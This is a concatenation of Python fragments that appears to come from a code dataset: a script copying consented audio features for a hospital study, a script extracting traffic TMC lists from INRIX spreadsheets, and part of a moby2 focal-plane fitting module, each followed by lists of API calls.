if (cond1 and cond2) or (cond3 and cond4):
return True
else:
return False
if __name__ == '__main__':
# Read data root path
root_dir = '/media/data/tiles-processed/tiles-phase2-delivery'
output_dir = '/media/data/tiles-opendataset/tiles-phase2-opendataset-audio'
delevery_root_path = os.path.abspath(os.path.join(root_dir, 'delivery_data'))
setup_root_path = os.path.abspath(os.path.join(root_dir, 'setup_data'))
participant_info_path = os.path.abspath(os.path.join(root_dir, 'participant-info'))
# read study period data frame
consent_df = pd.read_csv(os.path.join(root_dir, 'consents.csv'), index_col=5)
study_period = pd.read_csv(os.path.join(participant_info_path, 'study-periods.csv'), index_col=0)
micu_df = pd.read_csv(os.path.join(participant_info_path, 'p2_micuschedules_public_5.21.csv'), index_col=0)
micu_df = micu_df.dropna(subset=['MICU Start Date 1'])
participant_list = list(study_period.index)
consent_participant_list = list(consent_df.index)
participant_list.sort()
for id in participant_list:
# if no consent
if id not in consent_participant_list:
continue
print(id, consent_df.loc[id, 'audio_future'])
if consent_df.loc[id, 'audio_future'] is False:
continue
# if no data, continue
audio_data_path = os.path.join('/media/data/tiles-processed', 'tiles-phase2-opendataset-audio', 'raw-features', id)
if os.path.exists(audio_data_path) is False:
continue
micu_start1 = pd.to_datetime(micu_df.loc[id, 'MICU Start Date 1']).strftime(date_time_format)[:-3]
micu_start2 = str(micu_df.loc[id, 'MICU Start Date 2'])
micu_end1 = (pd.to_datetime(micu_df.loc[id, 'MICU End Date 1'])+timedelta(days=1, minutes=-1)).strftime(date_time_format)[:-3]
micu_end2 = str(micu_df.loc[id, 'MICU End Date 2'])
if str(micu_start2) != 'nan':
number_of_days1 = int((pd.to_datetime(micu_end1) - pd.to_datetime(micu_start1)).total_seconds() / (24 * 3600)) + 1
left_days = 21 - number_of_days1
if left_days:
micu_end2 = (pd.to_datetime(micu_start2) + timedelta(days=left_days, minutes=-1)).strftime(date_time_format)[:-3]
else:
micu_start2, micu_end2 = 'nan', 'nan'
file_list = os.listdir(audio_data_path)
for file_name in file_list:
if 'RawFeatures' in file_name:
continue
time = file_name.split('.csv.gz')[0]
date_time = datetime.datetime.fromtimestamp(int(time)).strftime(date_format)
if check_micu_data_valid(date_time, micu_start1, micu_end1, micu_start2, micu_end2) is True:
make_dir(output_dir)
make_dir(os.path.join(output_dir, 'raw-features'))
make_dir(os.path.join(output_dir, 'raw-features', id))
make_dir(os.path.join(output_dir, 'fg-predictions'))
make_dir(os.path.join(output_dir, 'fg-predictions', id))
# original file
raw_feature_output_path = os.path.join(output_dir, 'raw-features', id, file_name)
fg_predictions_output_path = os.path.join(output_dir, 'fg-predictions', id, str(time)+'.npy')
# output file
raw_feature_path = os.path.join(audio_data_path, file_name)
fg_predictions_path = os.path.join('/media/data/tiles-processed', 'tiles-phase2-opendataset-audio', 'fg-predictions', id, str(time)+'.npy')
shutil.copy(raw_feature_path, raw_feature_output_path)
if os.path.exists(fg_predictions_path) is True:
shutil.copy(fg_predictions_path, fg_predictions_output_path)
print('save %s, %s' % (id, raw_feature_path))
| [
"os.path.exists",
"os.listdir",
"os.path.join",
"os.mkdir",
"shutil.copy",
"datetime.timedelta",
"pandas.to_datetime"
] | [((274, 299), 'os.path.exists', 'os.path.exists', (['data_path'], {}), '(data_path)\n', (288, 299), False, 'import os\n'), ((318, 337), 'os.mkdir', 'os.mkdir', (['data_path'], {}), '(data_path)\n', (326, 337), False, 'import os\n'), ((1210, 1249), 'os.path.join', 'os.path.join', (['root_dir', '"""delivery_data"""'], {}), "(root_dir, 'delivery_data')\n", (1222, 1249), False, 'import os\n'), ((1289, 1325), 'os.path.join', 'os.path.join', (['root_dir', '"""setup_data"""'], {}), "(root_dir, 'setup_data')\n", (1301, 1325), False, 'import os\n'), ((1371, 1413), 'os.path.join', 'os.path.join', (['root_dir', '"""participant-info"""'], {}), "(root_dir, 'participant-info')\n", (1383, 1413), False, 'import os\n'), ((1480, 1518), 'os.path.join', 'os.path.join', (['root_dir', '"""consents.csv"""'], {}), "(root_dir, 'consents.csv')\n", (1492, 1518), False, 'import os\n'), ((1564, 1620), 'os.path.join', 'os.path.join', (['participant_info_path', '"""study-periods.csv"""'], {}), "(participant_info_path, 'study-periods.csv')\n", (1576, 1620), False, 'import os\n'), ((1661, 1732), 'os.path.join', 'os.path.join', (['participant_info_path', '"""p2_micuschedules_public_5.21.csv"""'], {}), "(participant_info_path, 'p2_micuschedules_public_5.21.csv')\n", (1673, 1732), False, 'import os\n'), ((2272, 2373), 'os.path.join', 'os.path.join', (['"""/media/data/tiles-processed"""', '"""tiles-phase2-opendataset-audio"""', '"""raw-features"""', 'id'], {}), "('/media/data/tiles-processed',\n 'tiles-phase2-opendataset-audio', 'raw-features', id)\n", (2284, 2373), False, 'import os\n'), ((3288, 3315), 'os.listdir', 'os.listdir', (['audio_data_path'], {}), '(audio_data_path)\n', (3298, 3315), False, 'import os\n'), ((2381, 2412), 'os.path.exists', 'os.path.exists', (['audio_data_path'], {}), '(audio_data_path)\n', (2395, 2412), False, 'import os\n'), ((4088, 4143), 'os.path.join', 'os.path.join', (['output_dir', '"""raw-features"""', 'id', 'file_name'], {}), "(output_dir, 'raw-features', id, file_name)\n", (4100, 4143), False, 'import os\n'), ((4336, 4376), 'os.path.join', 'os.path.join', (['audio_data_path', 'file_name'], {}), '(audio_data_path, file_name)\n', (4348, 4376), False, 'import os\n'), ((4549, 4603), 'shutil.copy', 'shutil.copy', (['raw_feature_path', 'raw_feature_output_path'], {}), '(raw_feature_path, raw_feature_output_path)\n', (4560, 4603), False, 'import shutil\n'), ((447, 472), 'pandas.to_datetime', 'pd.to_datetime', (['data_time'], {}), '(data_time)\n', (461, 472), True, 'import pandas as pd\n'), ((475, 502), 'pandas.to_datetime', 'pd.to_datetime', (['start_date1'], {}), '(start_date1)\n', (489, 502), True, 'import pandas as pd\n'), ((538, 563), 'pandas.to_datetime', 'pd.to_datetime', (['end_date1'], {}), '(end_date1)\n', (552, 563), True, 'import pandas as pd\n'), ((566, 591), 'pandas.to_datetime', 'pd.to_datetime', (['data_time'], {}), '(data_time)\n', (580, 591), True, 'import pandas as pd\n'), ((2475, 2527), 'pandas.to_datetime', 'pd.to_datetime', (["micu_df.loc[id, 'MICU Start Date 1']"], {}), "(micu_df.loc[id, 'MICU Start Date 1'])\n", (2489, 2527), True, 'import pandas as pd\n'), ((3725, 3765), 'os.path.join', 'os.path.join', (['output_dir', '"""raw-features"""'], {}), "(output_dir, 'raw-features')\n", (3737, 3765), False, 'import os\n'), ((3792, 3836), 'os.path.join', 'os.path.join', (['output_dir', '"""raw-features"""', 'id'], {}), "(output_dir, 'raw-features', id)\n", (3804, 3836), False, 'import os\n'), ((3880, 3922), 'os.path.join', 'os.path.join', (['output_dir', '"""fg-predictions"""'], {}), "(output_dir, 'fg-predictions')\n", (3892, 3922), False, 'import os\n'), ((3949, 3995), 'os.path.join', 'os.path.join', (['output_dir', '"""fg-predictions"""', 'id'], {}), "(output_dir, 'fg-predictions', id)\n", (3961, 3995), False, 'import os\n'), ((4623, 4658), 'os.path.exists', 'os.path.exists', (['fg_predictions_path'], {}), '(fg_predictions_path)\n', (4637, 4658), False, 'import os\n'), ((4688, 4748), 'shutil.copy', 'shutil.copy', (['fg_predictions_path', 'fg_predictions_output_path'], {}), '(fg_predictions_path, fg_predictions_output_path)\n', (4699, 4748), False, 'import shutil\n'), ((697, 722), 'pandas.to_datetime', 'pd.to_datetime', (['data_time'], {}), '(data_time)\n', (711, 722), True, 'import pandas as pd\n'), ((725, 752), 'pandas.to_datetime', 'pd.to_datetime', (['start_date2'], {}), '(start_date2)\n', (739, 752), True, 'import pandas as pd\n'), ((792, 817), 'pandas.to_datetime', 'pd.to_datetime', (['end_date2'], {}), '(end_date2)\n', (806, 817), True, 'import pandas as pd\n'), ((820, 845), 'pandas.to_datetime', 'pd.to_datetime', (['data_time'], {}), '(data_time)\n', (834, 845), True, 'import pandas as pd\n'), ((2646, 2696), 'pandas.to_datetime', 'pd.to_datetime', (["micu_df.loc[id, 'MICU End Date 1']"], {}), "(micu_df.loc[id, 'MICU End Date 1'])\n", (2660, 2696), True, 'import pandas as pd\n'), ((2697, 2726), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)', 'minutes': '(-1)'}), '(days=1, minutes=-1)\n', (2706, 2726), False, 'from datetime import timedelta\n'), ((3086, 3113), 'pandas.to_datetime', 'pd.to_datetime', (['micu_start2'], {}), '(micu_start2)\n', (3100, 3113), True, 'import pandas as pd\n'), ((3116, 3153), 'datetime.timedelta', 'timedelta', ([], {'days': 'left_days', 'minutes': '(-1)'}), '(days=left_days, minutes=-1)\n', (3125, 3153), False, 'from datetime import timedelta\n'), ((2894, 2919), 'pandas.to_datetime', 'pd.to_datetime', (['micu_end1'], {}), '(micu_end1)\n', (2908, 2919), True, 'import pandas as pd\n'), ((2922, 2949), 'pandas.to_datetime', 'pd.to_datetime', (['micu_start1'], {}), '(micu_start1)\n', (2936, 2949), True, 'import pandas as pd\n')] |
from util_data_storage_and_load import *
import openpyxl
data_folder = '/home/jzh/Dropbox/Research/\
Data-driven_estimation_inverse_optimization/INRIX/Raw_data/'
########## extract tmc info for link_1
# load attribute table link_1 data
wb_link_1 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_1.xlsx')
# get sheet name from workbook
sheet_link_1_name = wb_link_1.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_1 data
sheet_link_1 = wb_link_1.get_sheet_by_name(sheet_link_1_name)
tmc_list_link_1 = []
for i in xrange(2, 1 + sheet_link_1.max_row):
tmc_list_link_1.append(sheet_link_1.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_2
# load attribute table link_2 data
wb_link_2 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_2.xlsx')
# get sheet name from workbook
sheet_link_2_name = wb_link_2.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_2 data
sheet_link_2 = wb_link_2.get_sheet_by_name(sheet_link_2_name)
tmc_list_link_2 = []
for i in xrange(2, 1 + sheet_link_2.max_row):
tmc_list_link_2.append(sheet_link_2.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_3
# load attribute table link_3 data
wb_link_3 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_3.xlsx')
# get sheet name from workbook
sheet_link_3_name = wb_link_3.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_3 data
sheet_link_3 = wb_link_3.get_sheet_by_name(sheet_link_3_name)
tmc_list_link_3 = []
for i in xrange(2, 1 + sheet_link_3.max_row):
tmc_list_link_3.append(sheet_link_3.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_4
# load attribute table link_4 data
wb_link_4 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_4.xlsx')
# get sheet name from workbook
sheet_link_4_name = wb_link_4.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_4 data
sheet_link_4 = wb_link_4.get_sheet_by_name(sheet_link_4_name)
tmc_list_link_4 = []
for i in xrange(2, 1 + sheet_link_4.max_row):
tmc_list_link_4.append(sheet_link_4.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_5
# load attribute table link_5 data
wb_link_5 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_5.xlsx')
# get sheet name from workbook
sheet_link_5_name = wb_link_5.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_5 data
sheet_link_5 = wb_link_5.get_sheet_by_name(sheet_link_5_name)
tmc_list_link_5 = []
for i in xrange(2, 1 + sheet_link_5.max_row):
tmc_list_link_5.append(sheet_link_5.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_6
# load attribute table link_6 data
wb_link_6 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_6.xlsx')
# get sheet name from workbook
sheet_link_6_name = wb_link_6.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_6 data
sheet_link_6 = wb_link_6.get_sheet_by_name(sheet_link_6_name)
tmc_list_link_6 = []
for i in xrange(2, 1 + sheet_link_6.max_row):
tmc_list_link_6.append(sheet_link_6.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_7
# load attribute table link_7 data
wb_link_7 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_7.xlsx')
# get sheet name from workbook
sheet_link_7_name = wb_link_7.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_7 data
sheet_link_7 = wb_link_7.get_sheet_by_name(sheet_link_7_name)
tmc_list_link_7 = []
for i in xrange(2, 1 + sheet_link_7.max_row):
tmc_list_link_7.append(sheet_link_7.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_8
# load attribute table link_8 data
wb_link_8 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_8.xlsx')
# get sheet name from workbook
sheet_link_8_name = wb_link_8.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_8 data
sheet_link_8 = wb_link_8.get_sheet_by_name(sheet_link_8_name)
tmc_list_link_8 = []
for i in xrange(2, 1 + sheet_link_8.max_row):
tmc_list_link_8.append(sheet_link_8.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_9
# load attribute table link_9 data
wb_link_9 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_9.xlsx')
# get sheet name from workbook
sheet_link_9_name = wb_link_9.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_9 data
sheet_link_9 = wb_link_9.get_sheet_by_name(sheet_link_9_name)
tmc_list_link_9 = []
for i in xrange(2, 1 + sheet_link_9.max_row):
tmc_list_link_9.append(sheet_link_9.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_10
# load attribute table link_10 data
wb_link_10 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_10.xlsx')
# get sheet name from workbook
sheet_link_10_name = wb_link_10.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_10 data
sheet_link_10 = wb_link_10.get_sheet_by_name(sheet_link_10_name)
tmc_list_link_10 = []
for i in xrange(2, 1 + sheet_link_10.max_row):
tmc_list_link_10.append(sheet_link_10.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_11
# load attribute table link_11 data
wb_link_11 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_11.xlsx')
# get sheet name from workbook
sheet_link_11_name = wb_link_11.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_11 data
sheet_link_11 = wb_link_11.get_sheet_by_name(sheet_link_11_name)
tmc_list_link_11 = []
for i in xrange(2, 1 + sheet_link_11.max_row):
tmc_list_link_11.append(sheet_link_11.cell(row=i, column=2).value.encode('utf-8'))
########## extract tmc info for link_12
# load attribute table link_12 data
wb_link_12 = openpyxl.load_workbook(data_folder + 'filtered_INRIX_attribute_table_link_12.xlsx')
# get sheet name from workbook
sheet_link_12_name = wb_link_12.sheetnames[0].encode('utf-8')
# get sheet of attribute table link_12 data
sheet_link_12 = wb_link_12.get_sheet_by_name(sheet_link_12_name)
tmc_list_link_12 = []
for i in xrange(2, 1 + sheet_link_12.max_row):
tmc_list_link_12.append(sheet_link_12.cell(row=i, column=2).value.encode('utf-8'))
zdump([tmc_list_link_1, tmc_list_link_2, tmc_list_link_3, tmc_list_link_4, tmc_list_link_5, \
tmc_list_link_6, tmc_list_link_7, tmc_list_link_8, tmc_list_link_9, tmc_list_link_10, \
tmc_list_link_11, tmc_list_link_12], '../temp_files/tmc_list_links.pkz')
| [
"openpyxl.load_workbook"
] | [((252, 338), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_1.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_1.xlsx')\n", (274, 338), False, 'import openpyxl\n'), ((778, 864), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_2.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_2.xlsx')\n", (800, 864), False, 'import openpyxl\n'), ((1300, 1386), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_3.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_3.xlsx')\n", (1322, 1386), False, 'import openpyxl\n'), ((1822, 1908), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_4.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_4.xlsx')\n", (1844, 1908), False, 'import openpyxl\n'), ((2344, 2430), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_5.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_5.xlsx')\n", (2366, 2430), False, 'import openpyxl\n'), ((2866, 2952), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_6.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_6.xlsx')\n", (2888, 2952), False, 'import openpyxl\n'), ((3388, 3474), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_7.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_7.xlsx')\n", (3410, 3474), False, 'import openpyxl\n'), ((3910, 3996), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_8.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_8.xlsx')\n", (3932, 3996), False, 'import openpyxl\n'), ((4432, 4518), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_9.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_9.xlsx')\n", (4454, 4518), False, 'import openpyxl\n'), ((4957, 5044), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_10.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_10.xlsx')\n", (4979, 5044), False, 'import openpyxl\n'), ((5493, 5580), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_11.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_11.xlsx')\n", (5515, 5580), False, 'import openpyxl\n'), ((6029, 6116), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_12.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_12.xlsx')\n", (6051, 6116), False, 'import openpyxl\n')] |
#!/usr/bin/python
from __future__ import print_function
from __future__ import absolute_import
from past.builtins import basestring
import sys
import numpy as np
import moby2
trace = moby2.util.log.logger.trace
# transitional...
_fp_formats = {
'det_uid': '%4d',
'ok': '%1d',
'x0': '%9.6f',
'x0_err': '%9.6f',
'y0': '%9.6f',
'y0_err': '%9.6f',
'tau': '%8.5f',
'tau_err': '%8.5f',
'h': '%.4e',
'w': '%9.6f',
'sn': '%9.1f',
'base': '%.5e',
'n_obs': '%3d',
}
_fp_fields = ['ok', 'x0', 'x0_err', 'y0', 'y0_err', 'tau', 'tau_err',
'h', 'w', 'sn', 'base', 'n_obs']
_fp_columns_format_str = ' '.join(['{%s:%s}'%(k, _fp_formats[k][1:])
for k in _fp_fields]) + '\n'
class FPFitFile(moby2.detectors._SimpleDetData):
fields = _fp_fields
dtypes = {'ok': bool, 'n_obs': int}
columns_format_str = _fp_columns_format_str
xcfs = '{det_uid:4d} {ok:1d} '\
'{x0:9.6f} {x0_err:9.6f} {y0:9.6f} {y0_err:9.6f} '\
'{tau:8.5f} {tau_err:8.5f} '\
'{h:.4e} {w:9.6f} {sn:9.1f} {n_obs:3d}\n'
header = '# det_uid ok x0 x0_err y0 y0_err '\
'tau tau_err h w sn n_obs'
def __init__(self, det_uid=None):
if det_uid is not None:
self.det_uid = np.array(det_uid, dtype='int64')
n = len(det_uid)
for f in self.fields:
setattr(self, f, np.zeros(n, self.dtypes.get(f, 'float64')))
def __repr__(self):
name = repr(self.__class__)
return '%s with %i det_uid for fields ' % (name, len(self.det_uid)) + \
','.join(self.fields)
def update_row(self, row, data):
for k in self.fields:
if k in data:
getattr(self, k)[row] = data[k]
@classmethod
def from_columns_file(cls, filename):
data = np.loadtxt(filename, unpack=1)
det_uid = data[0].astype('int')
self = cls(det_uid)
self.ok = data[1].astype('int').astype('bool')
if len(data[2:]) == 11:
self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.w, self.sn, self.base, self.n_obs = data[2:]
elif len(data[2:-1]) == 9:
self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.w, self.sn = data[2:-1]
self.base = 0 * self.w
elif len(data[2:-1]) == 8:
self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.sn = data[2:-1]
self.w = 0 * self.x0
self.base = 0 * self.x0
elif len(data[2:-1]) == 4:
self.x0, self.x0_err, self.y0, self.y0_err = data[2:-1]
self.base = 0
else:
raise ValueError("Strange number of columns in %s" % filename)
self.n_obs = data[-1].astype('int')
return self
@classmethod
def from_file(cls, filename):
if filename.endswith('fits') or filename.endswith('fits.gz'):
return cls.from_fits_table(filename)
return cls.from_columns_file(filename)
# This supercedes _SimpleDetData.write
def write(self, filename, format=None):
if format is None:
if filename.endswith('fits') or filename.endswith('fits.gz'):
format = 'fits'
else:
format = 'txt'
data = [('det_uid', self.det_uid)]
for k in self.fields:
v = getattr(self, k)
if v.dtype == bool:
v = v.astype('int8')
data.append((k, v))
odb = moby2.util.StructDB.from_data(data,formats=_fp_formats)
if format == 'fits':
odb.to_fits_table(filename)
elif format == 'txt':
odb.to_column_file(filename)
else:
raise ValueError("Unknown format request, %s." % format)
def write_reduced(self, filename, scale_amp=1.):
format = 'txt'
if filename.endswith('.fits') or filename.endswith('.fits.gz'):
format = 'fits'
s = self.ok.astype(bool)
# det_uid peak_DAC SN tau
data = [('det_uid', self.det_uid[s]),
('peak_dac', self.h[s] * scale_amp),
('time_const', self.tau[s]),
('sn', self.sn[s]),
]
odb = moby2.util.StructDB.from_data(
data, formats={'peak_dac': '%12.3f',
'time_const': '%12.5f',
'sn': '%12.3f'})
if format == 'txt':
odb.to_column_file(filename)
elif format == 'fits':
odb.to_fits_table(filename)
@classmethod
def from_focal_plane(cls, fp):
"""
Initialize from a FocalPlane object.
"""
self = cls(fp.det_uid)
self.x0 = fp.x.copy()
self.y0 = fp.y.copy()
self.ok = fp.mask.copy()
zeros = np.zeros(self.ok.shape)
self.tau, self.h, self.w = zeros.copy(), zeros.copy(), zeros.copy()
self.base = zeros
return self
@classmethod
def combine_fits(cls, fits, template=None, params={}):
"""
Combine fits by shifting each one to match a template, and
averaging the good fits for each detector.
If a template is not provided, match to the first one.
"""
trace(1, 'Fitting and averaging %i fits' % len(fits))
if template is None:
template = fits[0]
# Start by shifting each fit to match the template.
orig_fits, fits = fits, []
fitter = FPTemplateFitter()
fitter.set_template(template)
fit_params = {'shift': True,
'rotation': False}
fit_params.update(params)
fit_results = [None for fi in range(len(orig_fits))]
for fi,f0 in enumerate(orig_fits):
if f0.ok.sum() < params.get('min_dets', 50):
trace(2, 'Discarding fit with only %i good fits' % f0.ok.sum())
continue
ok, result = fitter.fit(f0, fit_params)
if not ok:
trace(2, 'Discarding fit due to failed template match')
continue
f1 = f0.copy()
f1.x0 += result[0]
f1.y0 += result[1]
fits.append(f1)
fit_results[fi] = result
trace(1, 'Cut %i of %i fits (increase verbosity to see why).' % \
(len(orig_fits) - len(fits), len(orig_fits)))
if len(fits) == 0:
return None, None
print([len(f.det_uid) for f in fits])
n_det_uid = max([f.det_uid.max() for f in fits]) + 1
output = cls(np.arange(n_det_uid))
output.ok[:] = False
ARCMIN = np.pi/180/60
trace(1, 'Combining data for %i detectors' % n_det_uid)
for uid in output.det_uid:
ok = np.array([f.get_property('ok', det_uid=uid)[1]
for f in fits])
x, y, tau = np.transpose([f.get_property(['x0','y0','tau'], det_uid=uid)[1]
for f in fits])
for _x in [x, y, tau]:
# Yes, this happens...
ok *= ~np.isnan(_x) * ~np.isinf(_x)
x, y, tau = [_x[ok] for _x in [x,y,tau]]
if ok.sum() < params.get('min_obs', 1):
trace(2, 'Discarding det_uid=%i due to only %i contributors'
% (uid, ok.sum()))
continue
# Majority rules.
x0, y0 = np.median(x), np.median(y)
for iteration in [0,1,2]:
d0 = ((x - x0)**2 + (y-y0)**2)**.5
s0 = d0 < params.get('max_separation', 1)*ARCMIN
if s0.sum() == 0:
break
x0, y0 = x[s0].mean(), y[s0].mean()
if s0.sum() <= 0:
trace(2, 'Discarding det_uid=%i due to only %i items in '\
' combination' % (uid, s0.sum()))
continue
vals = {
'x0': x0, 'y0': y0,
'x0_err': x[s0].std(),
'y0_err': y[s0].std(),
'tau': tau[s0].mean(),
'tau_err': tau[s0].std(),
'n_obs': s0.sum(),
'ok': s0.sum() >= params.get('min_obs', 1) }
output.update_row(uid, vals)
trace(2, 'Result for det_uid=%i' % uid)
for k in ['x0', 'y0', 'tau']:
trace(2, ' %s = %10.5f +- %10.5f' % (k, vals[k], vals[k+'_err']))
return output, fit_results
def plot_positions(self, filename, auto_zoom=True, params={},
title='', fig=None):
import pylab as pl
if fig is None:
pl.figure()
pl.gcf().set_size_inches(6., 6.)
else:
pl.figure(fig.number)
s = self.ok
if s.sum() == 0:
pl.title(title + ' - no good fits')
pl.savefig(filename)
pl.clf()
units = params.get('units', 'deg')
scale = {'rad': 1., 'deg': 180/np.pi, 'arcmin': 60*180/np.pi}[units]
x, y = self.x0[s]*scale, self.y0[s]*scale
x0, y0 = np.median(x), np.median(y)
r = ((x-x0)**2 + (y-y0)**2)**.5
window = np.median(r)*3
inside = r < params.get('zoom', scale*window)
pl.scatter(x, y, alpha=0.5)
if params.get('limits') is None:
if np.any(inside):
for vect,limiter in [(x,pl.xlim), (y,pl.ylim)]:
lo, hi = limiter()
lo = min(lo, vect[inside].min())
hi = max(hi, vect[inside].max())
limiter(lo, hi)
else:
xlims, ylims = params['limits']
pl.xlim(*xlims), pl.ylim(*ylims)
pl.title(title + ' - %i dets outside window' % (~inside).sum())
pl.xlabel('X (%s)' % units)
pl.ylabel('Y (%s)' % units)
def smart_locate(ax, n_max, bases=[1,2,5]):
x0, x1 = ax.get_view_interval()
if x1 == x0:
return
delta = (x1-x0) / (n_max-1)
# Find smallest base and p such delta < base*10^p
log_spacing = min([
np.ceil(np.log10(delta) - np.log10(b)) + np.log10(b)
for b in bases])
loc = pl.MultipleLocator(10**log_spacing)
ax.set_major_locator(loc)
smart_locate(pl.gca().xaxis, 6)
smart_locate(pl.gca().yaxis, 9)
pl.savefig(filename)
pl.clf()
pl.figure()
def plot_rowcol_summaries(self, filename, array_data):
import pylab as pl
def x_eyes(bads=None):
# Mark bad fits with an x.
if bads is None:
bads = ~s
pl.scatter(cols[bads], rows[bads], marker='x', edgecolor='gray')
def limit_args(data, kw={}):
lo, hi = data.min(), data.max()
if s.sum() > 1:
lo, hi = data[s].min(), data[s].max()
if hi == lo:
hi = lo + 1
kw.update({'vmin': lo, 'vmax': hi})
return kw
def bin(data, dtype='float'):
out = np.zeros((n_rows, n_cols), dtype)
out[rows, cols] = data
return out
def imshow_reformat():
# Tighten boundaries, add labels...
pl.xlabel('Column')
pl.ylabel('Row')
pl.xlim(-0.5, n_cols-0.5)
pl.ylim(-0.5, n_rows-0.5)
s = self.ok
rows, cols = array_data.get_property(['row', 'col'], det_uid=self.det_uid)
n_rows, n_cols = rows.max()+1, cols.max()+1
# Init plotting
pl.figure()
pl.gcf().set_size_inches(6., 6.)
pl.subplots_adjust(left=.1, right=.95, top=.95, bottom=.1,
hspace=.2, wspace=.3)
title_fs = 12
# Time constants...
#
pl.subplot(2,2,1)
z = self.tau * 1e3
pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
pl.colorbar()
x_eyes()
pl.title('Time constants (ms)', fontsize=title_fs)
imshow_reformat()
pl.subplot(2,2,2)
z = self.tau_err * 1e3
pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
pl.colorbar()
x_eyes()
pl.title('Time constant errors (ms)', fontsize=title_fs)
imshow_reformat()
if self.ok.sum() > 10:
pl.subplot(2,2,3)
pl.hist(self.tau[self.ok]*1e3, bins=20) #min(20,self.ok.sum()//10)
pl.xlabel('Time constant (ms)')
pl.ylabel('N_dets')
pl.subplot(2,2,4)
pl.hist(self.tau_err[self.ok]*1e3, bins=self.ok.sum()//10)
pl.xlabel('Time constant errors (ms)')
pl.ylabel('N_dets')
pl.savefig(filename+'time_const.png')
pl.clf()
# Positions and stuff
#
for i in [0,1]:
pl.subplot(2,2,1+i)
z = {0: self.x0_err, 1:self.y0_err}[i]
z = z * 180*3600/np.pi # to arcseconds
pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
pl.colorbar()
x_eyes()
imshow_reformat()
pl.title('%s position RMS' % {0: 'X', 1: 'Y'}[i],
fontsize=title_fs)
pl.subplot(2,2,3)
z = self.n_obs
pl.imshow(bin(z), interpolation='nearest')
pl.colorbar()
imshow_reformat()
pl.title('N_obs', fontsize=title_fs)
pl.savefig(filename+'positions.png')
pl.clf()
# Destroy our subplot adjustments
pl.figure()
class FPTemplateFitter:
"""
Class for shift/rotate/shearing a template FPFitFile to match a
target FPFitFile.
After initializing, set the template to use:
fitter = FPTemplateFitter()
fitter.set_template(my_template_fp)
ok, params = fitter.fit(my_target_fp)
